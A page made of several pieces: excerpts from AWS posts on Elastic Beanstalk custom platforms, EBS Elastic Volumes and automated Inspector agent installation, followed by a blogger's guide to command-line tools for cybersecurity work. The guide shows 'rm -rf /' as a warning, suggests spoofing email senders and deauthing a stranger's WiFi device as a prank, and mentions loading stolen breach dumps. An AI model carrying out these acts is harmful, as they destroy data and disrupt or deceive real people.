With the custom platform now created, you can deploy an application either via the AWS CLI or via the AWS Elastic Beanstalk Console. The ability to create an environment with an already created custom platform is only available for the new environment wizard.

You can select an already created custom platform on the Create a new environment web page by selecting the Custom Platform radio option under Platform. You would then select the custom platform you previously created from the list of available custom platforms.

Additionally, the EB CLI can be used to deploy the latest version of your custom platform. Using the command line to deploy the previously created custom platform would look as follows:

eb deploy -p tara-ebcustom-platform

Summary

You can get started building your own custom platforms for Elastic Beanstalk today. To learn more about Elastic Beanstalk or custom platforms by going the AWS Elastic Beanstalk product page or the Elastic Beanstalk developer guide.

It is always interesting to speak with our customers and to learn how the dynamic nature of their business and their applications drives their block storage requirements. These needs change over time, creating the need to modify existing volumes to add capacity or to change performance characteristics. Today’s 24×7 operating models leaves no room for downtime; as a result, customers want to make changes without going offline or otherwise impacting operations.

Over the years, we have introduced new EBS offerings that support an ever-widening set of use cases. For example, we introduced two new volume types in 2016 – Throughput Optimized HDD (st1) and Cold HDD (sc1). Our customers want to use these volume types as storage tiers, modifying the volume type to save money or to change the performance characteristics, without impacting operations.

In other words, our customers want their EBS volumes to be even more elastic!

New Elastic Volumes Today we are launching a new EBS feature we call Elastic Volumes and making it available for all current-generation EBS volumes attached to current-generation EC2 instances. You can now increase volume size, adjust performance, or change the volume type while the volume is in use. You can continue to use your application while the change takes effect.

This new feature will greatly simplify (or even eliminate) many of your planning, tuning, and space management chores. Instead of a traditional provisioning cycle that can take weeks or months, you can make changes to your storage infrastructure instantaneously, with a simple API call.

You can address the following scenarios (and many more that you can come up with on your own) using Elastic Volumes:

Changing Workloads – You set up your infrastructure in a rush and used the General Purpose SSD volumes for your block storage. After gaining some experience you figure out that the Throughput Optimized volumes are a better fit, and simply change the type of the volume.

Spiking Demand – You are running a relational database on a Provisioned IOPS volume that is set to handle a moderate amount of traffic during the month, with a 10x spike in traffic during the final three days of each month due to month-end processing. You can use Elastic Volumes to dial up the provisioning in order to handle the spike, and then dial it down afterward.

Increasing Storage – You provisioned a volume for 100 GiB and an alarm goes off indicating that it is now at 90% of capacity. You increase the size of the volume and expand the file system to match, with no downtime, and in a fully automated fashion.

To make a change from the Console, simply select the volume and choose Modify Volume from the Action menu:

Then make any desired changes to the volume type, size, and Provisioned IOPS (if appropriate). Here I am changing my 75 GiB General Purpose (gp2) volume into a 400 GiB Provisioned IOPS volume, with 20,000 IOPS:

When I click on Modify I confirm my intent, and click on Yes:

The volume’s state reflects the progress of the operation (modifying, optimizing, or complete):

The next step is to expand the file system so that it can take advantage of the additional storage space. To learn how to do that, read Expanding the Storage Space of an EBS Volume on Linux or Expanding the Storage Space of an EBS Volume on Windows. You can expand the file system as soon as the state transitions to optimizing (typically a few seconds after you start the operation). The new configuration is in effect at this point, although optimization may continue for up to 24 hours. Billing for the new configuration begins as soon as the state turns to optimizing (there’s no charge for the modification itself).

Automatic Elastic Volume Operations While manual changes are fine, there’s plenty of potential for automation. Here are a couple of ideas:

Right-Sizing – Use a CloudWatch alarm to watch for a volume that is running at or near its IOPS limit. Initiate a workflow and approval process that could provision additional IOPS or change the type of the volume. Or, publish a “free space” metric to CloudWatch and use a similar approval process to resize the volume and the filesystem.

Cost Reduction – Use metrics or schedules to reduce IOPS or to change the type of a volume. Last week I spoke with a security auditor at a university. He collects tens of gigabytes of log files from all over campus each day and retains them for 60 days. Most of the files are never read, and those that are can be scanned at a leisurely pace. They could address this use case by creating a fresh General Purpose volume each day, writing the logs to it at high speed, and then changing the type to Throughput Optimized.

As I mentioned earlier, you need to resize the file system in order to be able to access the newly provisioned space on the volume. In order to show you how to automate this process, my colleagues built a sample that makes use of CloudWatch Events, AWS Lambda, EC2 Systems Manager, and some PowerShell scripting. The rule matches the modifyVolume event emitted by EBS and invokes the logEvents Lambda function:

The function locates the volume, confirms that it is attached to an instance that is managed by EC2 Systems Manager, and then adds a “maintenance tag” to the instance:

Later (either manually or on a schedule), EC2 Systems Manager is used to run a PowerShell script on all of the instances that are tagged for maintenance. The script looks at the instance’s disks and partitions, and resizes all of the drives (filesystems) to the maximum allowable size. Here’s an excerpt:

This AWS Security Blog post continues in the same vein, describing how to use Amazon Inspector to automate various aspects of security management. In this post, I show you how to install the Amazon Inspector agent automatically through the Amazon EC2 Systems Manager when a new Amazon EC2 instance is launched. In a subsequent post, I will show you how to update EC2 instances automatically that run Linux when Amazon Inspector discovers a missing security patch.

Amazon EC2 Systems Manager is a set of services that makes it easy to manage your Windows or Linux hosts running on EC2 instances. EC2 Systems Manager does this through an agent called EC2 Simple Systems Manager (SSM), which is installed on your instances. With SSM on your EC2 instances, you can save yourself an SSH or RDP session to the instance to perform management tasks.

With EC2 Systems Manager, you can perform various tasks at scale through a simple API, CLI, or EC2 Run Command. The EC2 Run Command can execute a Unix shell script on Linux instances or a Windows PowerShell script on Windows instances. When you use EC2 Systems Manager to run a script on an EC2 instance, the output is piped to a text file in Amazon S3 for you automatically. Therefore, you can examine the output without visiting the system or inventing your own mechanism for capturing console output.

The solution

Step 1: Enable EC2 Systems Manager and install the EC2 SSM agent

Setting up EC2 Systems Manager is relatively straightforward, but you must set up EC2 Systems Manager at the time you launch the instance. This is because the SSM agent will use an instance role to communicate with the EC2 Systems Manager securely. When launched with the appropriately configured IAM role, the EC2 instance is provided with a set of credentials that allows the SSM agent to perform actions on behalf of the account owner. The policy on the IAM role determines the permissions associated with these credentials.

The easiest way I have found to do this is to create the role, and then each time you launch an instance, associate the role with the instance and provide the SSM agent installation script in the instance’s user data in the launch wizard or API. Here’s how:

Create an instance role so that the on-instance SSM agent can communicate with EC2 Systems Manager. If you already need an instance role for some other purpose, use the IAM console to attach the AmazonEC2RoleforSSM managed policy to your existing role.

When launching the instance with the EC2 launch wizard, associate the role you just created with the new instance.

When launching the instance with the EC2 launch wizard, provide the appropriate script as user data for your operating system and architecture to install the SSM agent as the instance is launched. To see this process and scripts in full, see Installing the SSM Agent.

Note: You must change the scripts slightly when copying them from the instructions to the EC2 user data: the word region in the curl command must be replaced with the AWS region code (for example, us-east-1).

When your instance starts, the SSM agent is installed. Having the SSM agent on the instance is the key component to the automated installation of the Amazon Inspector agent on the instance.

Let’s assume that you will install the SSM agent when you first launch your instances. With that assumption in mind, you have two methods for installing the Amazon Inspector agent.

Method 1: Install the Amazon Inspector agent with user data

Just as we did above with the SSM agent, we can use the user data feature of EC2 to execute the Amazon Inspector agent installation script during instance launch. This is useful if you have decided not to install the SSM agent, but it is more work than necessary if you are in the habit of deploying the SSM agent at the launch of an instance.

To install the Amazon Inspector agent with user data on Linux systems, simply add the following commands to the User data box in the instance launch wizard (as shown in the following screenshot). This script works without modification on any Linux distribution that Amazon Inspector supports.

In environments that launch new instances continually, installing the Amazon Inspector agent automatically when an instance starts prevents some additional work. As we discussed in the previous method, you need to modify your instance launch process to include the EC2 SSM agent. This means you need to configure your instances with an EC2 Systems Manager role, as well as run the EC2 SSM agent.

First, create an IAM role that gives your Lambda function the permissions it needs to deploy the Amazon Inspector agent. Then, create the Lambda job that uses the SSM RunShellScript to install the Amazon Inspector agent. Finally, set up Amazon CloudWatch Events to run the Lambda job whenever a new instance enters the Running state.

Here are the details of the three-step process:

Step 1 – Create an IAM role for the Lambda function to use to send commands to EC2 Systems Manager:

Choose Specific state(s) and Running. This tells CloudWatch to generate an event when an instance enters the Running state.

Under Targets, choose Add target and then Lambda function.

Choose the function that you created in Step 2.

Click Configure details. Type a name and description for the event, and choose Create rule.

Summary

You have completed the setup! Now, whenever an EC2 instance enters the Running state (either on initial creation or on reboot), CloudWatch Events triggers an event that invokes the Lambda function that you created. The Lambda function then uses EC2 System Manager to install the Amazon Inspector agent on the instance.

In a subsequent AWS Security Blog post, I will show you how to take your security assessment automation a step further by automatically performing remediations for Amazon Inspector findings by using EC2 System Manager and Lambda.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation questions, start a new thread on the Amazon Inspector forum.

On Twitter I made the mistake of asking people about command-line basics for cybersec professionals. A got a lot of useful responses, which I summarize in this long (5k words) post. It’s mostly driven by the tools I use, with a bit of input from the tweets I got in response to my query.

bash

By command-line this document really means bash.

There are many types of command-line shells. Windows has two, ‘cmd.exe’ and ‘PowerShell’. Unix started with the Bourne shell ‘sh’, and there have been many variations of this over the years, ‘csh’, ‘ksh’, ‘zsh’, ‘tcsh’, etc. When GNU rewrote Unix user-mode software independently, they called their shell “Bourne Again Shell” or “bash” (queue “JSON Bourne” shell jokes here).

Bash is the default shell for Linux and macOS. It’s also available on Windows, as part of their special “Windows Subsystem for Linux”. The windows version of ‘bash’ has become my most used shell.

For Linux IoT devices, BusyBox is the most popular shell. It’s easy to clear, as it includes feature-reduced versions of popular commands.

man

‘Man’ is the command you should not run if you want help for a command.

Man pages are designed to drive away newbies. They are only useful if you already mostly an expert with the command you desire help on. Man pages list all possible features of a program, but do not highlight examples of the most common features, or the most common way to use the commands.

Take ‘sed’ as an example. It’s used most commonly to do a search-and-replace in files, like so:

$ sed ‘s/rob/dave/’ foo.txt

This usage is so common that many non-geeks know of it. Yet, if you type ‘man sed’ to figure out how to do a search and replace, you’ll get nearly incomprehensible gibberish, and no example of this most common usage.

I point this out because most guides on using the shell recommend ‘man’ pages to get help. This is wrong, it’ll just endlessly frustrate you. Instead, google the commands you need help on, or better yet, search StackExchange for answers.

You might try asking questions, like on Twitter or forum sites, but this requires a strategy. If you ask a basic question, self-important dickholes will respond by telling you to “rtfm” or “read the fucking manual”. A better strategy is to exploit their dickhole nature, such as saying “too bad command xxx cannot do yyy”. Helpful people will gladly explain why you are wrong, carefully explaining how xxx does yyy.

If you must use ‘man’, use the ‘apropos’ command to find the right man page. Sometimes multiple things in the system have the same or similar names, leading you to the wrong page.

apt-get install yum

Using the command-line means accessing that huge open-source ecosystem. Most of the things in this guide do no already exist on the system. You have to either compile them from source, or install via a package-manager. Linux distros ship with a small footprint, but have a massive database of precompiled software “packages” in the cloud somewhere. Use the “package manager” to install the software from the cloud.

On RedHat systems, use “yum” instead. On BSD, use the “ports” system, which you can also get working for macOS.

If no pre-compiled package exists for a program, then you’ll have to download the source code and compile it. There’s about an 80% chance this will work easy, following the instructions. There is a 20% chance you’ll experience “dependency hell”, for example, needing to install two mutually incompatible versions of Python.

Bash is a scripting language

Don’t forget that shells are really scripting languages. The bit that executes a single command is just a degenerate use of the scripting language. For example, you can do a traditional for loop like:

$ for i in $(seq 1 9); do echo $i; done

In this way, ‘bash’ is no different than any other scripting language, like Perl, Python, NodeJS, PHP CLI, etc. That’s why a lot of stuff on the system actually exists as short ‘bash’ programs, aka. shell scripts.

Few want to write bash scripts, but you are expected to be able to read them, either to tweek existing scripts on the system, or to read StackExchange help.

File system commands

The macOS “Finder” or Windows “File Explorer” are just graphical shells that help you find files, open, and save them. The first commands you learn are for the same functionality on the command-line: pwd, cd, ls, touch, rm, rmdir, mkdir, chmod, chown, find, ln, mount.

The command “rm –rf /” removes everything starting from the root directory. This will also follow mounted server directories, deleting files on the server. I point this out to give an appreciation of the raw power you have over the system from the command-line, and how easy you can disrupt things.

Of particular interest is the “mount” command. Desktop versions of Linux typically mount USB flash drives automatically, but on servers, you need to do it manually, e.g.:

$ mkdir ~/foobar$ mount /dev/sdb ~/foobar

You’ll also use the ‘mount’ command to connect to file servers, using the “cifs” package if they are Windows file servers:

The first thing hackers do when hacking into a system is run “uname” (to figure out what version of the OS is running) and “id” (to figure out which account they’ve acquired, like “root” or some other user).

The Linux system command I use most is “dmesg” (or ‘tail –f /var/log/dmesg’) which shows you the raw system messages. For example, when I plug in USB drives to a server, I look in ‘dmesg’ to find out which device was added so that I can mount it. I don’t know if this is the best way, it’s just the way I do it (servers don’t automount USB drives like desktops do).

Networking commands

The permanent state of the network (what gets configured on the next bootup) is configured in text files somewhere. But there are a wealth of commands you’ll use to view the current state of networking, make temporary changes, and diagnose problems.

The ‘ifconfig’ command has long been used to view the current TCP/IP configuration and make temporary changes. Learning how TCP/IP works means playing a lot with ‘ifconfig’. Use “ifconfig –a” for even more verbose information.

Use the “route” command to see if you are sending packets to the right router.

Use ‘arp’ command to make sure you can reach the local router.

Use ‘traceroute’ to make sure packets are following the correct route to their destination. You should learn the nifty trick it’s based on (TTLs). You should also play with the TCP, UDP, and ICMP options.

Use ‘ping’ to see if you can reach the target across the Internet. Usefully measures the latency in milliseconds, and congestion (via packet loss). For example, ping NetFlix throughout the day, and notice how the ping latency increases substantially during “prime time” viewing hours.

Use ‘dig’ to make sure DNS resolution is working right. (Some use ‘nslookup’ instead). Dig is useful because it’s the raw universal DNS tool – every time they add some new standard feature to DNS, they add that feature into ‘dig’ as well.

The ‘netstat –tualn’ command views the current TCP/IP connections and which ports are listening. I forget what the various options “tualn” mean, only it’s the output I always want to see, rather than the raw “netstat” command by itself.

You’ll want to use ‘ethtool –k’ to turn off checksum and segmentation offloading. These are features that break packet-captures sometimes.

There is this new fangled ‘ip’ system for Linux networking, replacing many of the above commands, but as an old timer, I haven’t looked into that.

Some other tools for diagnosing local network issues are ‘tcpdump’, ‘nmap’, and ‘netcat’. These are described in more detail below.

ssh

In general, you’ll remotely log into a system in order to use the command-line. We use ‘ssh’ for that. It uses a protocol similar to SSL in order to encrypt the connection. There are two ways to use ‘ssh’ to login, with a password or with a client-side certificate.

When using SSH with a password, you type “ssh [email protected]”. The remote system will then prompt you for a password for that account.

When using client-side certificates, use “ssh-keygen” to generate a key, then either copy the public-key of the client to the server manually, or use “ssh-copy-id” to copy it using the password method above.

How this works is basic application of public-key cryptography. When logging in with a password, you get a copy of the server’s public-key the first time you login, and if it ever changes, you get a nasty warning that somebody may be attempting a man in the middle attack.

When using client-side certificates, the server trusts your public-key. This is similar to how client-side certificates work in SSL VPNs.

You can use SSH for things other than loging into a remote shell. You can script ‘ssh’ to run commands remotely on a system in a local shell script. You can use ‘scp’ (SSH copy) to transfer files to and from a remote system. You can do tricks with SSH to create tunnels, which is popular way to bypass the restrictive rules of your local firewall nazi.

openssl

This is your general cryptography toolkit, doing everything from simple encryption, to public-key certificate signing, to establishing SSL connections.

It is extraordinarily user hostile, with terrible inconsistency among options. You can only figure out how to do things by looking up examples on the net, such as on StackExchange. There are competing SSL libraries with their own command-line tools, like GnuTLS and Mozilla NSS that you might find easier to use.

The fundamental use of the ‘openssl’ tool is to create public-keys, “certificate requests”, and creating self-signed certificates. All the web-site certificates I’ve ever obtained has been using the openssl command-line tool to create CSRs.

You should practice using the ‘openssl’ tool to encrypt files, sign files, and to check signatures.

You can use openssl just like PGP for encrypted emails/messages, but following the “S/MIME” standard rather than PGP standard. You might consider learning the ‘pgp’ command-line tools, or the open-source ‘gpg’ or ‘gpg2’ tools as well.

You should learn how to use the “openssl s_client” feature to establish SSL connections, as well as the “openssl s_server” feature to create an SSL proxy for a server that doesn’t otherwise support SSL.

Learning all the ways of using the ‘openssl’ tool to do useful things will go a long way in teaching somebody about crypto and cybersecurity. I can imagine an entire class consisting of nothing but learning ‘openssl’.

netcat (nc, socat, cyptocat, ncat)

A lot of Internet protocols are based on text. That means you can create a raw TCP connection to the service and interact with them using your keyboard. The classic tool for doing this is known as “netcat”, abbreviated “nc”. For example, connect to Google’s web server at port and type the HTTP HEAD command followed by a blank line (hit [return] twice):

Another classic example is to connect to port 25 on a mail server to send email, spoofing the “MAIL FROM” address.

There are several versions of ‘netcat’ that work over SSL as well. My favorite is ‘ncat’, which comes with ‘nmap’, as it’s actively maintained. In theory, “openssl s_client” should also work this way.

nmap

At some point, you’ll need to port scan. The standard program for this is ‘nmap’, and it’s the best. The classic way of using it is something like:

# nmap –A scanme.nmap.org

The ‘-A’ option means to enable all the interesting features like OS detection, version detection, and basic scripts on the most common ports that a server might have open. It takes awhile to run. The “scanme.nmap.org” is a good site to practice on.

Nmap is more than just a port scanner. It has a rich scripting system for probing more deeply into a system than just a port, and to gather more information useful for attacks. The scripting system essentially contains some attacks, such as password guessing.

Scanning the Internet, finding services identified by ‘nmap’ scripts, and interacting with them with tools like ‘ncat’ will teach you a lot about how the Internet works.

BTW, if ‘nmap’ is too slow, using ‘masscan’ instead. It’s a lot faster, though has much more limited functionality.

Packet sniffing with tcpdump and tshark

All Internet traffic consists of packets going between IP addresses. You can capture those packets and view them using “packet sniffers”. The most important packet-sniffer is “Wireshark”, a GUI. For the command-line, there is ‘tcpdump’ and ‘tshark’.

You can run tcpdump on the command-line to watch packets go in/out of the local computer. This performs a quick “decode” of packets as they are captured. It’ll reverse-lookup IP addresses into DNS names, which means its buffers can overflow, dropping new packets while it’s waiting for DNS name responses for previous packets (which can be disabled with -n):

# tcpdump –p –i eth0

A common task is to create a round-robin set of files, saving the last 100 files of 1-gig each. Older files are overwritten. Thus, when an attack happens, you can stop capture, and go backward in times and view the contents of the network traffic using something like Wireshark:

# tcpdump –p -i eth0 -s65535 –C 1000 –W 100 –w cap

Instead of capturing everything, you’ll often set “BPF” filters to narrow down to traffic from a specific target, or a specific port.

The above examples use the –p option to capture traffic destined to the local computer. Sometimes you may want to look at all traffic going to other machines on the local network. You’ll need to figure out how to tap into wires, or setup “monitor” ports on switches for this to work.

A more advanced command-line program is ‘tshark’. It can apply much more complex filters. It can also be used to extract the values of specific fields and dump them to a text files.

Base64/hexdump/xxd/od

These are some rather trivial commands, but you should know them.

The ‘base64’ command encodes binary data in text. The text can then be passed around, such as in email messages. Base64 encoding is often automatic in the output from programs like openssl and PGP.

In many cases, you’ll need to view a hex dump of some binary data. There are many programs to do this, such as hexdump, xxd, od, and more.

grep

Grep searches for a pattern within a file. More important, it searches for a regular expression (regex) in a file. The fu of Unix is that a lot of stuff is stored in text files, and use grep for regex patterns in order to extra stuff stored in those files.

The power of this tool really depends on your mastery of regexes. You should master enough that you can understand StackExhange posts that explain almost what you want to do, and then tweek them to make them work.

Grep, by default, shows only the matching lines. In many cases, you only want the part that matches. To do that, use the –o option. (This is not available on all versions of grep).

You’ll probably want the better, “extended” regular expressions, so use the –E option.

You’ll often want “case-insensitive” options (matching both upper and lower case), so use the –i option.

For example, to extract all MAC address from a text file, you might do something like the following. This extracts all strings that are twelve hex digits.

$ grep –Eio ‘[0-9A-F]{12}’ foo.txt

Text processing

Grep is just the first of the various “text processing filters”. Other useful ones include ‘sed’, ‘cut’, ‘sort’, and ‘uniq’.

You’ll be an expert as piping output of one to the input of the next. You’ll use “sort | uniq” as god (Dennis Ritchie) intended and not the heresy of “sort –u”.

You might want to master ‘awk’. It’s a new programming language, but once you master it, it’ll be easier than other mechanisms.

You’ll end up using ‘wc’ (word-count) a lot. All it does is count the number of lines, words, characters in a file, but you’ll find yourself wanting to do this a lot.

csvkit and jq

You get data in CSV format and JSON format a lot. The tools ‘csvkit’ and ‘jq’ respectively help you deal with those tools, to convert these files into other formats, sticking the data in databases, and so forth.

It’ll be easier using these tools that understand these text formats to extract data than trying to write ‘awk’ command or ‘grep’ regexes.

strings

Most files are binary with a few readable ASCII strings. You use the program ‘strings’ to extract those strings.

This one simple trick sounds stupid, but it’s more powerful than you’d think. For example, I knew that a program probably contained a hard-coded password. I then blindly grabbed all the strings in the program’s binary file and sent them to a password cracker to see if they could decrypt something. And indeed, one of the 100,000 strings in the file worked, thus finding the hard-coded password.

tail -f

So ‘tail’ is just a standard Linux tool for looking at the end of files. If you want to keep checking the end of a live file that’s constantly growing, then use “tail –f”. It’ll sit there waiting for something new to be added to the end of the file, then print it out. I do this a lot, so I thought it’d be worth mentioning.

tar –xvfz, gzip, xz, 7z

In prehistorical times (like the 1980s), Unix was backed up to tape drives. The tar command could be used to combine a bunch of files into a single “archive” to be sent to the tape drive, hence “tape archive” or “tar”.

These days, a lot of stuff you download will be in tar format (ending in .tar). You’ll need to learn how to extract it:

$ tar –xvf something.tar

Nobody knows what the “xvf” options mean anymore, but these letters most be specified in that order. I’m joking here, but only a little: somebody did a survey once and found that virtually nobody know how to use ‘tar’ other than the canned formulas such as this.

Along with combining files into an archive you also need to compress them. In prehistoric Unix, the “compress” command would be used, which would replace a file with a compressed version ending in ‘.z’. This would found to be encumbered with patents, so everyone switched to ‘gzip’ instead, which replaces a file with a new one ending with ‘.gz’.

$ ls foo.txt*foo.txt$ gzip foo.txt$ ls foo.txt*foo.txt.gz

Combined with tar, you get files with either the “.tar.gz” extension, or simply “.tgz”. You can untar and uncompress at the same time:

$ tar –xvfz something .tar.gz

Gzip is always good enough, but nerds gonna nerd and want to compress with slightly better compression programs. They’ll have extensions like “.bz2”, “.7z”, “.xz”, and so on. There are a ton of them. Some of them are supported directly by the ‘tar’ program:

$ tar –xvfj something.tar.bz2

Then there is the “zip/unzip” program, which supports Windows .zip file format. To create compressed archives these days, I don’t bother with tar, but just use the ZIP format. For example, this will recursively descend a directory, adding all files to a ZIP file that can easily be extracted under Windows:

$ zip –r test.zip ./test/

ddI should include this under the system tools at the top, but it’s interesting for a number of purposes. The usage is simply to copy one file to another, the in-file to the out-file.

$ dd if=foo.txt of=foo2.txt

But that’s not interesting. What interesting is using it to write to “devices”. The disk drives in your system also exist as raw devices under the /dev directory.

For example, if you want to create a boot USB drive for your Raspberry Pi:

Or, you might want to image a drive on the system, for later forensics, without stumbling on things like open files.

# dd if=/dev/sda of=/media/Lexar/infected.img

The ‘dd’ program has some additional options, like block size and so forth, that you’ll want to pay attention to.

screen and tmux

You log in remotely and start some long running tool. Unfortunately, if you log out, all the processes you started will be killed. If you want it to keep running, then you need a tool to do this.

I use ‘screen’. Before I start a long running port scan, I run the “screen” command. Then, I type [ctrl-a][ctrl-d] to disconnect from that screen, leaving it running in the background.

Then later, I type “screen –r” to reconnect to it. If there are more than one screen sessions, using ‘-r’ by itself will list them all. Use “-r pid” to reattach to the proper one. If you can’t, then use “-D pid” or “-D –RR pid” to forced the other session to detached from whoever is using it.

Tmux is an alternative to screen that many use. It’s cool for also having lots of terminal screens open at once.

curl and wget

Sometimes you want to download files from websites without opening a browser. The ‘curl’ and ‘wget’ programs do that easily. Wget is the traditional way of doing this, but curl is a bit more flexible. I use curl for everything these days, except mirroring a website, in which case I just do “wget –m website”.

The thing that makes ‘curl’ so powerful is that it’s really designed as a tool for poking and prodding all the various features of HTTP. That it’s also useful for downloading files is a happy coincidence. When playing with a target website, curl will allow you do lots of complex things, which you can then script via bash. For example, hackers often write their cross-site scripting/forgeries in bash scripts using curl.

node/php/python/perl/ruby/lua

As mentioned above, bash is its own programming language. But it’s weird, and annoying. So sometimes you want a real programming language. Here are some useful ones.

Yes, PHP is a language that runs in a web server for creating web pages. But if you know the language well, it’s also a fine command-line language for doing stuff.

Yes, JavaScript is a language that runs in the web browser. But if you know it well, it’s also a great language for doing stuff, especially with the “nodejs” version.

Then there are other good command line languages, like the Python, Ruby, Lua, and the venerable Perl.

What makes all these great is the large library support. Somebody has already written a library that nearly does what you want that can be made to work with a little bit of extra code of your own.

My general impression is that Python and NodeJS have the largest libraries likely to have what you want, but you should pick whichever language you like best, whichever makes you most productive. For me, that’s NodeJS, because of the great Visual Code IDE/debugger.

iptables, iptables-save

I shouldn’t include this in the list. Iptables isn’t a command-line tool as such. The tool is the built-in firewalling/NAT features within the Linux kernel. Iptables is just the command to configure it.

Firewalling is an important part of cybersecurity. Everyone should have some experience playing with a Linux system doing basic firewalling tasks: basic rules, NATting, and transparent proxying for mitm attacks.

Use ‘iptables-save’ in order to persistently save your changes.

MySQL

Similar to ‘iptables’, ‘mysql’ isn’t a tool in its own right, but a way of accessing a database maintained by another process on the system.

Filters acting on text files only goes so far. Sometimes you need to dump it into a database, and make queries on that database.

There is also the offensive skill needed to learn how targets store things in a database, and how attackers get the data.

Hackers often publish raw SQL data they’ve stolen in their hacks (like the Ashley-Madisan dump). Being able to stick those dumps into your own database is quite useful. Hint: disable transaction logging while importing mass data.

If you don’t like SQL, you might consider NoSQL tools like Elasticsearch, MongoDB, and Redis that can similarly be useful for arranging and searching data. You’ll probably have to learn some JSON tools for formatting the data.

Reverse engineering tools

A cybersecurity specialty is “reverse engineering”. Some want to reverse engineer the target software being hacked, to understand vulnerabilities. This is needed for commercial software and device firmware where the source code is hidden. Others use these tools to analyze viruses/malware.

Qemu is useful is a useful virtual-machine. It can emulate full systems, such as an IoT device based on the MIPS processor. Like some other tools mentioned here, it’s more a full subsystem than a simple command-line tool.

On a live system, you can use ‘strace’ to view what system calls a process is making. Use ‘lsof’ to view which files and network connections a process is making.

Password crackers

A common cybersecurity specialty is “password cracking”. There’s two kinds: online and offline password crackers.

Typical online password crackers are ‘hydra’ and ‘medusa’. They can take files containing common passwords and attempt to log on to various protocols remotely, like HTTP, SMB, FTP, Telnet, and so on. I used ‘hydra’ recently in order to find the default/backdoor passwords to many IoT devices I’ve bought recently in my test lab.

Online password crackers must open TCP connections to the target, and try to logon. This limits their speed. They also may be stymied by systems that lock accounts, or introduce delays, after too many bad password attempts.

Typical offline password crackers are ‘hashcat’ and ‘jtr’ (John the Ripper). They work off of stolen encrypted passwords. They can attempt billions of passwords-per-second, because there’s no network interaction, nothing slowing them down.

Understanding offline password crackers means getting an appreciation for the exponential difficulty of the problem. A sufficiently long and complex encrypted password is uncrackable. Instead of brute-force attempts at all possible combinations, we must use tricks, like mutating the top million most common passwords.

I use hashcat because of the great GPU support, but John is also a great program.

WiFi hacking

A common specialty in cybersecurity is WiFi hacking. The difficulty in WiFi hacking is getting the right WiFi hardware that supports the features (monitor mode, packet injection), then the right drivers installed in your operating system. That’s why I use Kali rather than some generic Linux distribution, because it’s got the right drivers installed.

The ‘aircrack-ng’ suite is the best for doing basic hacking, such as packet injection. When the parents are letting the iPad babysit their kid with a loud movie at the otherwise quite coffeeshop, use ‘aircrack-ng’ to deauth the kid.

The ‘reaver’ tool is useful for hacking into sites that leave WPS wide open and misconfigured.

Some useful DNS tools are ‘dig’ (described above), dnsrecon/dnsenum/fierce that try to enumerate and guess as many names as possible within a domain. These tools all have unique features, but also have a lot of overlap.

Nikto is a basic tool for probing for common vulnerabilities, out-of-date software, and so on. It’s not really a vulnerability scanner like Nessus used by defenders, but more of a tool for attack.

SQLmap is a popular tool for probing for SQL injection weaknesses.

Then there is ‘msfconsole’. It has some attack features. This is humor – it has all the attack features. Metasploit is the most popular tool for running remote attacks against targets, exploiting vulnerabilities.

Text editor

Finally, there is the decision of text editor. I use ‘vi’ variants. Others like ‘nano’ and variants. There’s no wrong answer as to which editor to use, unless that answer is ‘emacs’.

Conclusion

Obviously, not every cybersecurity professional will be familiar with every tool in this list. If you don’t do reverse-engineering, then you won’t use reverse-engineering tools.

On the other hand, regardless of your specialty, you need to know basic crypto concepts, so you should know something like the ‘openssl’ tool. You need to know basic networking, so things like ‘nmap’ and ‘tcpdump’. You need to be comfortable processing large dumps of data, manipulating it with any tool available. You shouldn’t be frightened by a little sysadmin work.

The above list is therefore a useful starting point for cybersecurity professionals. Of course, those new to the industry won’t have much familiarity with them. But it’s fair to say that I’ve used everything listed above at least once in the last year, and the year before that, and the year before that. I spend a lot of time on StackExchange and Google searching the exact options I need, so I’m not an expert, but I am familiar with the basic use of all these things.

Tags

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.